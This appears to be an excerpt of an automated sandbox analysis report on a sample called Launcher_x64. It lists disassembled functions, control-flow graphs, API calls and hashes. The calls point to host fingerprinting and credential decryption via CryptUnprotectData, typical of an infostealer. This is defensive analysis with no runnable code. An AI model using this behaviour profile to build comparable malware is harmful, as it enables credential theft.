LdrInitializeThunk 13507->13509 13509->13506

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 00437A30 Relevance: 35.8, APIs: 11, Strings: 9, Instructions: 810memorycomCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 0 437a30-437a55 1 437a60-437ab4 0->1 1->1 2 437ab6-437acf 1->2 3 437ad0-437afb 2->3 3->3 4 437afd-437b43 3->4 5 437b50-437b6d 4->5 5->5 6 437b6f-437b8b 5->6 8 437c42-437c4f 6->8 9 437b91-437b9a 6->9 11 437c50-437ca5 8->11 10 437ba0-437bdc 9->10 10->10 13 437bde-437bf6 10->13 11->11 12 437ca7-437d01 CoCreateInstance 11->12 14 437d07-437d3b 12->14 15 438255-438288 call 43dda0 GetVolumeInformationW 12->15 16 437c00-437c33 13->16 17 437d40-437d71 14->17 22 438292-438294 15->22 23 43828a-43828e 15->23 16->16 19 437c35-437c3a 16->19 17->17 20 437d73-437d9e SysAllocString 17->20 19->8 28 438244-438251 SysFreeString 20->28 29 437da4-437dbe CoSetProxyBlanket 20->29 24 4382ad-4382b8 22->24 23->22 26 4382c4-4382e2 24->26 27 4382ba-4382c1 24->27 30 4382f0-438330 26->30 27->26 28->15 31 437dc4-437ddf 29->31 32 43823a-438240 29->32 30->30 33 438332-438355 30->33 34 437de0-437e0b 31->34 32->28 35 438360-438384 33->35 34->34 36 437e0d-437e86 SysAllocString 34->36 35->35 37 438386-4383b2 call 41db40 35->37 38 437e90-437ed3 36->38 42 4383c0-4383c8 37->42 38->38 40 437ed5-437f01 SysAllocString 38->40 45 437f07-437f29 40->45 46 43822b-438238 SysFreeString * 2 40->46 42->42 44 4383ca-4383cc 42->44 47 4383d2-4383e2 call 407f30 44->47 48 4382a0-4382a7 44->48 52 438221-438227 45->52 53 437f2f-437f32 45->53 46->32 47->48 48->24 50 4383e7-4383ee 48->50 52->46 53->52 55 437f38-437f3d 53->55 55->52 56 437f43-437f97 VariantInit 55->56 57 437fa0-437fe7 56->57 57->57 58 437fe9-437ffb 57->58 59 437fff-438009 58->59 60 438210-43821d VariantClear 59->60 61 43800f-438015 59->61 60->52 61->60 62 43801b-438025 61->62 63 438027-43802e 62->63 64 43805d-43805f 62->64 66 43803c-438040 63->66 65 438061-43807b call 407eb0 64->65 75 438081-43808d 65->75 76 4381bc-4381cd 65->76 68 438042-43804b 66->68 69 438030 66->69 72 438052-438056 68->72 73 43804d-438050 68->73 71 438031-43803a 69->71 71->65 71->66 72->71 74 438058-43805b 72->74 73->71 74->71 75->76 77 438093-43809b 75->77 78 4381d4-4381e4 76->78 79 4381cf 76->79 80 4380a0-4380aa 77->80 81 4381e6 78->81 82 4381eb-43820d call 407ee0 call 407ec0 78->82 79->78 83 4380c0-4380c6 80->83 84 4380ac-4380b1 80->84 81->82 82->60 87 4380e4-4380f2 83->87 88 4380c8-4380cb 83->88 86 438160-438166 84->86 91 438168-43816e 86->91 93 43817a-438182 87->93 94 4380f8-4380fb 87->94 88->87 92 4380cd-4380e2 88->92 91->76 96 438170-438172 91->96 92->86 97 438184-43818a 93->97 98 43818c-438193 93->98 94->93 99 4380fd-438157 94->99 96->80 100 438178 96->100 97->91 101 438195-4381b6 98->101 102 4381b8-4381ba 98->102 99->86 100->76 101->86 102->86
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437CF9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(10401E4F), ref: 00437D78
                                                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437DB6
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(A210A018), ref: 00437E12
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(105A1E4E), ref: 00437EDA
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(2625241B), ref: 00437F4C
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438245
                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438281
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                                                                                                                                                                                                        • String ID: ()$0j6l$1-lw$7v.H$9]^_$A%T'$Dx$M!@#$MN
                                                                                                                                                                                                                                                                                        • API String ID: 505850577-2631378170
                                                                                                                                                                                                                                                                                        • Opcode ID: e0c2a04e89183fa61c242c274a676a16a0f5589baa0ff97e0d627b20027def06
                                                                                                                                                                                                                                                                                        • Instruction ID: a0f1f38f0aa8d91442959c38e5ab5fd8015b3e1277f0a867d9220f2f779a2222
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0c2a04e89183fa61c242c274a676a16a0f5589baa0ff97e0d627b20027def06
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A942F072A083508FD310CF64C88179BFBE1EBD9310F19892EF9D59B391D678D8068B96
                                                                                                                                                                                                                                                                                        Function 00432740 Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 103 432740-43282c GetSystemMetrics * 2 109 432833-432bdb 103->109
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                        • String ID: $!3C$3/C$>-C$H3C$I2C$O.C$l3C$.C$3C
                                                                                                                                                                                                                                                                                        • API String ID: 4116985748-142951046
                                                                                                                                                                                                                                                                                        • Opcode ID: 68a8099a1451fbabe752d9b6aba3cbf13b07f14d6f966a0471c796c0e7cf811a
                                                                                                                                                                                                                                                                                        • Instruction ID: cefdfa2f4bb4a907d3b0707c83b2961d81cb34de209d25866783f0d6dfe31f94
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68a8099a1451fbabe752d9b6aba3cbf13b07f14d6f966a0471c796c0e7cf811a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64B15DB04197808BE760DF14D58878FBBE0BB86348F518D1EE498AB351D7B99548CF8B
                                                                                                                                                                                                                                                                                        Function 00423220 Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 552COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 116 423220-423276 117 423280-4232dc 116->117 117->117 118 4232de-423322 117->118 120 423330-423356 118->120 120->120 121 423358-423362 120->121 122 4236d2 121->122 123 4233a0 121->123 124 423500 121->124 125 4236b0 121->125 126 4233b1-4233bd 121->126 127 423516-42351f 121->127 128 423506-42350d 121->128 129 4236b6-4236cb 121->129 130 4233a8-4233ae call 407ec0 121->130 131 423369-42336f 121->131 132 4233be-4233cb 121->132 133 4236ed-42379f 121->133 123->130 140 423521-423526 127->140 141 423528 127->141 128->127 129->122 129->126 129->130 142 423943 129->142 143 423806-423828 129->143 144 4236e7 129->144 145 4236d8-4236de call 407ec0 129->145 146 423949-42394f call 407ec0 129->146 130->126 138 423371-423376 131->138 139 423378 131->139 136 4233d4 132->136 137 4233cd-4233d2 132->137 134 4237a0-4237de 133->134 134->134 148 4237e0-4237f4 call 4211c0 134->148 154 4233db-423411 call 407eb0 136->154 137->154 150 42337b-423399 call 407eb0 138->150 139->150 151 42352f-4235d8 call 407eb0 140->151 141->151 149 423830-423851 143->149 145->144 162 4237f9-4237fe 148->162 149->149 159 423853-4238d6 149->159 150->122 150->123 150->124 150->125 150->126 150->127 150->128 150->129 150->130 150->132 150->133 167 4235e0-423623 151->167 169 423420-423478 154->169 163 4238e0-423912 159->163 162->143 163->163 168 423914-423939 call 420dc0 163->168 167->167 173 423625-423631 167->173 168->142 169->169 170 42347a-42348a 169->170 175 4234b1-4234bd 170->175 176 42348c-423491 170->176 177 423633-42363a 173->177 178 423651-42365d 173->178 180 4234e1-4234ec call 43e6c0 175->180 181 4234bf-4234c3 175->181 179 4234a0-4234af 176->179 182 423640-42364f 177->182 183 423681-4236a1 GetLogicalDrives call 43e6c0 178->183 184 42365f-423663 178->184 179->175 179->179 189 4234f1-4234f9 180->189 185 4234d0-4234df 181->185 182->178 182->182 183->122 183->125 183->126 183->129 183->130 183->142 183->143 183->144 183->145 183->146 187 423670-42367f 184->187 185->180 185->185 187->183 187->187 189->122 189->124 189->125 189->127 189->128 189->129 189->133 189->143 189->145
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: Fw$nu$su$KM
                                                                                                                                                                                                                                                                                        • API String ID: 0-4031965064
                                                                                                                                                                                                                                                                                        • Opcode ID: be056bf66652b930f6d7f5fe939cd363de02baa19934b622e25241b4cc114444
                                                                                                                                                                                                                                                                                        • Instruction ID: 546090f0aae7dc36f6e0d4649872a0ec1d0f8291a6775c6417dd0acd4fbf0cbc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be056bf66652b930f6d7f5fe939cd363de02baa19934b622e25241b4cc114444
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7102FCB5A08320CBC310CF65E88125BBBF1EFC6305F44896DE9C59B381E7789906CB96
                                                                                                                                                                                                                                                                                        Function 004085B0 Relevance: 7.6, APIs: 5, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040863A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00408640
                                                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040864F
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(?,00000010,00000000), ref: 00408655
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00408694
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b1eede587d1454609993c3a2c80326da517b7577879fd8f8bab8d6289ce9bdba
                                                                                                                                                                                                                                                                                        • Instruction ID: 92dae0f12611f0e97a25a87696c2a8d7ef8639134bb70ffc9b48fb368595a998
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1eede587d1454609993c3a2c80326da517b7577879fd8f8bab8d6289ce9bdba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A51126B5E402009BD7247F65AD0AB5636119F83305F0A827EB8957F3E7DE3D980082EE
                                                                                                                                                                                                                                                                                        Function 0042C911 Relevance: 4.0, APIs: 2, Instructions: 1009COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 550 42c911-42c95a call 43dda0 554 42c960-42c9bd 550->554 554->554 555 42c9bf-42c9ca 554->555 556 42c9eb-42c9f9 555->556 557 42c9cc-42c9d3 555->557 558 42ca0b-42ca45 556->558 559 42c9fb-42c9ff 556->559 560 42c9e0-42c9e9 557->560 563 42ca50-42ca74 558->563 561 42ca00-42ca09 559->561 560->556 560->560 561->558 561->561 563->563 564 42ca76-42ca7b 563->564 565 42ca9d-42caa0 564->565 566 42ca7d-42ca86 564->566 568 42caa3-42caab 565->568 567 42ca90-42ca99 566->567 567->567 569 42ca9b 567->569 570 42cabb-42caee 568->570 571 42caad 568->571 569->568 574 42caf0-42cb02 570->574 572 42cab0-42cab9 571->572 572->570 572->572 574->574 575 42cb04-42cb09 574->575 576 42cb1b-42cb23 575->576 577 42cb0b-42cb0f 575->577 579 42cb25-42cb28 576->579 580 42cb3b-42cb83 call 43dda0 576->580 578 42cb10-42cb19 577->578 578->576 578->578 581 42cb30-42cb39 579->581 585 42cb90-42cbb9 580->585 581->580 581->581 585->585 586 42cbbb-42cbc3 585->586 587 42cbc5-42cbcf 586->587 588 42cbdd 586->588 589 42cbd0-42cbd9 587->589 590 42cbe0-42cbee 588->590 589->589 591 42cbdb 589->591 592 42cbf4-42cbff 590->592 593 42cd48-42cd7a 590->593 591->590 594 42cc00-42cc0d 592->594 595 42cd80-42cdc8 593->595 596 42cc20-42cc26 594->596 597 42cc0f-42cc1b 594->597 595->595 598 42cdca-42cdd7 595->598 600 42cc60-42cc6e 596->600 601 42cc28-42cc2b 596->601 599 42ccd0-42cced 597->599 602 42cdeb-42cdf6 call 4309f0 598->602 603 42cdd9-42cdda 598->603 609 42ccef-42ccf5 599->609 605 42cd01-42cd0c 600->605 606 42cc74-42cc77 600->606 601->600 604 42cc2d-42cc4f 601->604 618 42ce22-42ceaa call 43dda0 GetComputerNameExA 602->618 607 42cde0-42cde9 603->607 604->599 610 42cd13-42cd16 605->610 611 42cd0e-42cd11 605->611 606->605 612 42cc7d-42ccc8 606->612 607->602 607->607 609->593 614 42ccf7-42ccf9 609->614 616 42cd42-42cd46 610->616 617 42cd18-42cd3a 610->617 611->609 612->599 614->594 615 42ccff 614->615 615->593 616->599 617->616 621 42ceb0-42cf0a 618->621 621->621 622 42cf0c-42cf1c 621->622 623 42cf2b-42cf3c 622->623 624 42cf1e 622->624 626 42cf5b-42cf95 GetComputerNameExA 623->626 627 42cf3e-42cf41 623->627 625 42cf20-42cf29 624->625 625->623 625->625 629 42cfa0-42cfc4 626->629 628 42cf50-42cf59 627->628 628->626 628->628 629->629 630 42cfc6-42cfcb 629->630 631 42cff0-42cff6 630->631 632 42cfcd-42cfd9 630->632 634 42cff9-42d004 631->634 633 42cfe0-42cfe9 632->633 633->633 635 42cfeb 633->635 636 42d020 634->636 637 42d006-42d009 634->637 635->634 639 42d023-42d05b 636->639 638 42d010-42d019 637->638 638->638 640 42d01b 638->640 642 42d060-42d072 639->642 640->639 642->642 643 42d074-42d079 642->643 644 42d0a0 643->644 645 42d07b-42d081 643->645 647 42d0a3-42d0ab 644->647 646 42d090-42d099 645->646 646->646 648 42d09b 646->648 649 42d0bb-42d0ff call 43dda0 647->649 650 42d0ad 647->650 648->647 655 42d100-42d129 649->655 651 42d0b0-42d0b9 650->651 651->649 651->651 655->655 656 42d12b-42d130 655->656 657 42d132-42d138 656->657 658 42d150 656->658 660 42d140-42d149 657->660 659 42d153-42d164 658->659 661 42d2b0-42d2db 659->661 662 42d16a-42d175 659->662 660->660 663 42d14b 660->663 665 42d2e0-42d32b 661->665 664 42d180-42d18c 662->664 663->659 666 42d1a0-42d1a6 664->666 667 42d18e-42d193 664->667 665->665 668 42d32d-42d33a 665->668 670 42d200-42d20e 666->670 671 42d1a8-42d1ab 666->671 669 42d1c3 667->669 672 42ce00 668->672 673 42d340-42d346 668->673 676 42d1c5-42d1e1 669->676 678 42d210-42d213 670->678 679 42d264-42d26d 670->679 671->670 675 42d1ad-42d1c0 671->675 674 42ce03-42ce06 call 4309f0 672->674 677 42d350-42d359 673->677 686 42ce0b-42ce1f 674->686 675->669 683 42d1e3-42d1e9 676->683 677->677 684 42d35b 677->684 678->679 685 42d215-42d25f 678->685 681 42d276-42d279 679->681 682 42d26f-42d271 679->682 687 42d2a4-42d2a6 681->687 688 42d27b-42d29f 681->688 682->683 683->661 689 42d1ef-42d1f1 683->689 684->674 685->676 686->618 687->669 688->669 689->664 690 42d1f3 689->690 690->661
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 0042CE8D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 78533710b792235b2fcf5670ad857914e575acef22f59b740b7afb0475bcaef1
                                                                                                                                                                                                                                                                                        • Instruction ID: 76ac2631fd4ef694283d1fb06db62edaa810a82f58b3964977fa30f48bd96897
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78533710b792235b2fcf5670ad857914e575acef22f59b740b7afb0475bcaef1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD6225306047918FD725CF29D480763BBE2AF9B310B68859DC4D68F796C739E806CBA5
                                                                                                                                                                                                                                                                                        Function 00426A70 Relevance: 2.9, Strings: 2, Instructions: 392COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 710 426a70-426a89 711 426a90-426ac4 710->711 711->711 712 426ac6-426ad2 711->712 713 426b14-426b23 712->713 714 426ad4-426adf 712->714 715 426b30-426b52 713->715 716 426ae0-426ae7 714->716 715->715 717 426b54-426b5a 715->717 718 426af0-426af6 716->718 719 426ae9-426aec 716->719 721 426b60-426b7a call 43a860 717->721 722 426ec7-426ed0 717->722 718->713 720 426af8-426b0c call 43c390 718->720 719->716 723 426aee 719->723 726 426b11 720->726 728 426b80-426bb3 721->728 723->713 726->713 728->728 729 426bb5-426bc1 728->729 730 426bc3-426bcb 729->730 731 426bff-426c03 729->731 734 426bd0-426bd7 730->734 732 426c09-426c12 731->732 733 426ebe-426ec4 call 43a8a0 731->733 735 426c20-426c35 732->735 733->722 737 426be0-426be6 734->737 738 426bd9-426bdc 734->738 735->735 740 426c37-426c39 735->740 737->731 739 426be8-426bf7 call 43c390 737->739 738->734 742 426bde 738->742 746 426bfc 739->746 744 426c40-426c4f call 407eb0 740->744 745 426c3b 740->745 742->731 749 426c70-426c7a 744->749 745->744 746->731 750 426c60-426c6e 749->750 751 426c7c-426c7f 749->751 750->749 752 426c93-426c9b 750->752 753 426c80-426c8f 751->753 755 426ca1-426cac 752->755 756 426eb5-426ebb call 407ec0 752->756 753->753 754 426c91 753->754 754->750 757 426cfb-426d14 call 407eb0 755->757 758 426cae-426cb9 755->758 756->733 769 426e37-426e5f 757->769 770 426d1a-426d20 757->770 760 426ccc-426cd0 758->760 763 426cd2-426cdb 760->763 764 426cc0 760->764 767 426cf0-426cf4 763->767 768 426cdd-426ce0 763->768 766 426cc1-426cca 764->766 766->757 766->760 767->766 772 426cf6-426cf9 767->772 768->766 771 426e60-426e8c 769->771 770->769 773 426d26-426d2c 770->773 771->771 775 426e8e-426eb1 call 408a90 call 407ec0 771->775 772->766 774 426d30-426d3a 773->774 776 426d50-426d55 774->776 777 426d3c-426d42 774->777 775->756 780 426d80-426d8e 776->780 781 426d57-426d5a 776->781 779 426de0-426de6 777->779 787 426de8-426dee 779->787 784 426d90-426d93 780->784 785 426dfa-426e03 780->785 781->780 783 426d5c-426d71 781->783 783->779 784->785 788 426d95-426dd8 784->788 791 426e05-426e07 785->791 792 426e09-426e0c 785->792 787->769 790 426df0-426df2 787->790 788->779 790->774 793 426df8 790->793 791->787 794 426e33-426e35 792->794 795 426e0e-426e31 792->795 793->769 794->779 795->779
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: (-.o$Y
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3975210238
                                                                                                                                                                                                                                                                                        • Opcode ID: 5836a6319e0d82008b8d91f2484fa105ce52bfeb4640bd1525e8b197794c4d8d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fd69eb372224707830a6684b889158793aac8ed2c8f35a98a6474a8a9c76d1c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5836a6319e0d82008b8d91f2484fa105ce52bfeb4640bd1525e8b197794c4d8d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB16E727043618BDB14DF25D8426ABB792EFD5304F9B853EE8858B341D239ED06C39A
                                                                                                                                                                                                                                                                                        Function 0043E6C0 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: <;:9$@
                                                                                                                                                                                                                                                                                        • API String ID: 0-663980302
                                                                                                                                                                                                                                                                                        • Opcode ID: 25030e0f54187dd7d97a5094e6b67fba24dfc7d6c651b842d8accc0a2a09a670
                                                                                                                                                                                                                                                                                        • Instruction ID: a422c0ca82652f737e4f1e142246e6692507047bea1aeb5a718bc394c3bfefce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25030e0f54187dd7d97a5094e6b67fba24dfc7d6c651b842d8accc0a2a09a670
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E4155B1A053108BDB18CF22C89176BB3E2FF99318F19952DE889473D0E7399D04CB86
                                                                                                                                                                                                                                                                                        Function 0042D78A Relevance: 2.2, APIs: 1, Instructions: 681COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0042DB8E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3960555810-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 72ad962deb764843d33cd4e862aa4473b958394af15c913e83fe9b27cef8db69
                                                                                                                                                                                                                                                                                        • Instruction ID: 1e38fdd2a070c5190578cea8d7e00dd51e2a253d61de10ec1e8fea606ecc6a7c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ad962deb764843d33cd4e862aa4473b958394af15c913e83fe9b27cef8db69
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8212E670604B518FD725CF29D490762FBE2AF97310F28829ED4DA8B792D739E806CB54
                                                                                                                                                                                                                                                                                        Function 004182BC Relevance: 1.7, APIs: 1, Instructions: 157encryptionCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041848D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 834300711-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 94f1619d0213c66efed45e7fc48bac5a3fb9675e641e5121d8995465e2b33201
                                                                                                                                                                                                                                                                                        • Instruction ID: b5f110dc900f150b17a9ab2730c3f268e57193e66b42661d4aec5e60a62e6f1c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94f1619d0213c66efed45e7fc48bac5a3fb9675e641e5121d8995465e2b33201
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F251C9716082429FC718CF28C4917AFB7D2ABD5314F588A2EE4A9C7381E739D845C786
                                                                                                                                                                                                                                                                                        Function 0043C390 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(0043E4EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C3BE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                                        Function 0043E950 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
